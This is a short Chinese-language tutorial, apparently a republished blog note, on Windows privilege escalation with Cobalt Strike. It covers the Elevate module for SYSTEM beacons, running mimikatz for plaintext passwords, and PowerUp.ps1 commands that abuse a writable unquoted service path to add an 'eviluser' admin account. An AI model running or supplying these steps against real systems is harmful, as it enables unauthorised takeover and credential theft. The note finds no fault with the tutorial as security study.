Cobalt Strike 之:提权
阅读原文时间:2023年07月08日阅读:1

郑重声明:

本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

Cobalt Strike 之:提权

目录

1 利用 Cobalt Strike 提权模块提权

  1. 获取 beacon 会话

  2. 右键当前 beacon 会话选择 Access:Elevate 模块

  3. 右键带*号的 beacon 会话选择 Access:Elevate 模块

  4. 获取了具有 SYSTEM 权限的 beacon 会话

  5. 尝试运行 mimikatz 获取当前系统下的明文密码

    当前密码为空:

2 Cobalt Strike 与 PowerShell 模块提权

# 1.导入 PowerShell 模块
powershell-import
回车后选择 PowerUp.ps1

# 2.查看“unquoted service paths”可以注入的程序或服务
powershell Invoke-AllChecks

# 3.确认可注入的程序或服务是否具有 user:F 的权限(F完全控制)
powershell icacls "C:\Program Files (x86)\2345Soft\2345Explorer\Protect\Protect_2345Explorer.exe"

# 利用具有完全控制权限的,又可注入的程序或服务添加高权限的账号与密码
powershell Install-ServiceBinary -ServiceName Protect_2345Explorer -UserName eviluser -Password 123456

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器